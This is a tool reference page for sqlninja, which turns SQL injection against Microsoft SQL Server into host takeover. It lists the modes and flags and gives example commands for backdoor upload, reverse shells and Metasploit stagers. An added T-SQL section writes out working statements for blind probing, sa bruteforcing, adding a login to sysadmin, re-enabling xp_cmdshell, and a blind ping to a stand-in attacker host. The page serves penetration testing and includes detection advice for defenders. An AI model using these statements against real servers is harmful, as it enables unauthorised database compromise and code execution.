
sqlninja

SQL Server injection and takeover tool that escalates a SQL injection vulnerability in a web application backed by Microsoft SQL Server into remote access on the database server, up to full GUI access through its Metasploit wrapper. It combines remote registry modifications that disable Data Execution Prevention, automatically generated debug.exe scripts for uploading binaries over plain HTTP, and Metasploit integration for remote code execution.

Description

sqlninja is designed to exploit SQL injection vulnerabilities specifically on Microsoft SQL Server and turn them into a full compromise of the host. Starting from an injection point, it can disable Data Execution Prevention through remote registry writes, generate debug.exe scripts that rebuild an executable on the target using nothing but HTTP requests, and hand the resulting payload to Metasploit for reliable delivery.

Use cases include testing MSSQL web applications for injection flaws, bruteforcing sa accounts, privilege escalation, uploading backdoors, establishing shells (direct, reverse, ICMP, DNS-tunneled), and launching Metasploit stagers. It supports comprehensive attack chains from fingerprinting to post-exploitation.

The tool requires a configuration file (sqlninja.conf by default) that contains the raw HTTP request to the vulnerable page with the __SQL2INJECT__ placeholder marking the injection point, plus settings such as the attacker's address for reverse connections. Each mode handles one phase of the exploitation chain. Because most stages are blind, the debug and verbose options are the main way to see why a step fails.

How It Works

sqlninja operates by injecting T-SQL payloads tailored to MSSQL into the HTTP request defined in sqlninja.conf, where a placeholder marks the injection point. It confirms the injection blindly with a time-based check (WAITFOR DELAY), fingerprints the server version, the current login and its privileges, and whether xp_cmdshell is available, then runs the mode-specific attack: bruteforcing the sa password, escalating privileges by adding the current login to the sysadmin server role, resurrecting xp_cmdshell, uploading executables by generating debug.exe scripts (debug.exe is a 16-bit DOS utility that 64-bit Windows does not ship, so upload mode only works against 32-bit targets), scanning for open outbound ports, establishing direct or reverse TCP shells as well as DNS-tunneled and ICMP shells, issuing blind OS commands, or handing a stager to Metasploit. Every step is carried out over HTTP requests built from the injection string in sqlninja.conf.
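The T-SQL behind the stages above, written out as an added illustration for this page. These are the standard SQL Server statements that the test, fingerprint, bruteforce, escalation, resurrectxp and sqlcmd modes rely on; they are not sqlninja's own payloads, which are assembled from the configured injection string, and the host, login and password values are placeholders.

```sql
-- Illustrative T-SQL for each sqlninja phase (added example, not tool code).
-- Placeholders: appuser, GUESS, KNOWN_SA_PASSWORD, attacker.example.

-- 1. Test mode: blind confirmation. If the page answers about 5 s later
--    than normal, the injected statement executed.
WAITFOR DELAY '0:0:5';

-- 2. Fingerprint: current login, server version, sysadmin membership (1/0).
SELECT SYSTEM_USER, @@VERSION, IS_SRVROLEMEMBER('sysadmin');
-- Does the xp_cmdshell extended procedure still exist? (1 = yes)
SELECT COUNT(*) FROM master..sysobjects WHERE name = 'xp_cmdshell';
-- SQL Server 2005+: is it enabled? (1 = yes)
SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';

-- 3. Bruteforce mode: try an sa password through a loopback connection.
--    The statement errors unless the password is right. On 2005+ this needs
--    'Ad Hoc Distributed Queries' enabled; on 2000 it is on by default.
SELECT 1 FROM OPENROWSET('SQLOLEDB',
    'Network=DBMSSOCN;Address=127.0.0.1;uid=sa;pwd=GUESS',
    'SELECT 1');

-- 4. Escalation mode: with the sa password known, reconnect as sa and add
--    the low-privileged application login to the sysadmin server role.
SELECT 1 FROM OPENROWSET('SQLOLEDB',
    'Network=DBMSSOCN;Address=127.0.0.1;uid=sa;pwd=KNOWN_SA_PASSWORD',
    'EXEC master..sp_addsrvrolemember ''appuser'', ''sysadmin''; SELECT 1');

-- 5. Resurrect xp_cmdshell.
--    2005+: it is disabled, not removed, so re-enable it.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
--    2000: an administrator may have dropped it; re-register the DLL.
EXEC sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';

-- 6. sqlcmd mode: blind OS command. Nothing is returned to the page, so
--    success is observed through timing or an outbound connection.
EXEC master..xp_cmdshell 'ping -n 1 attacker.example';
```

Each of these steps leaves evidence a defender can alert on: sp_configure changes to xp_cmdshell, new sysadmin role members, and bursts of failed sa logins from the database host itself (the OPENROWSET loopback), all of which are visible in the SQL Server error log and audit trail.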

Installation

```bash
sudo apt install sqlninja
```

Flags

-m <mode>      Required. Available modes: t/test (test injection), f/fingerprint, b/bruteforce (sa account), e/escalation (add user to sysadmin), x/resurrectxp (recreate xp_cmdshell), u/upload (.scr file), s/dirshell (direct shell), k/backscan (open outbound port), r/revshell (reverse shell), d/dnstunnel (DNS-tunneled shell), i/icmpshell (reverse ICMP shell), c/sqlcmd (blind OS command), m/metasploit (Metasploit wrapper)
-f <file>      Configuration file (default: sqlninja.conf)
-p <password>  sa password
-w <wordlist>  Wordlist to use in bruteforce mode (dictionary method only)
-g             Generate the debug script and exit (only valid in upload mode)
-v             Verbose output
-d <mode>      Activate debug: 1 (print injected commands), 2 (print raw HTTP requests), 3 (print raw HTTP responses), all (all of the above)

Examples

Connect to the target in test mode to verify if the SQL injection is working
sqlninja -m t -f /root/sqlninja.conf
Fingerprint the target to identify user, xp_cmdshell availability, and server details
sqlninja -m f -f /root/sqlninja.conf
Bruteforce the sa account using a specified wordlist in dictionary mode
sqlninja -m b -f /root/sqlninja.conf -w wordlist.txt
Escalate privileges by adding current user to sysadmin server role
sqlninja -m e -f /root/sqlninja.conf
Upload a .scr backdoor file to the target
sqlninja -m u -f /root/sqlninja.conf
Start a reverse shell from the target
sqlninja -m r -f /root/sqlninja.conf
Use Metasploit wrapper to deploy stagers on the target
sqlninja -m m -f /root/sqlninja.conf
Display full usage information and available options
sqlninja --help
Updated 2026-04-16. Source: kali.org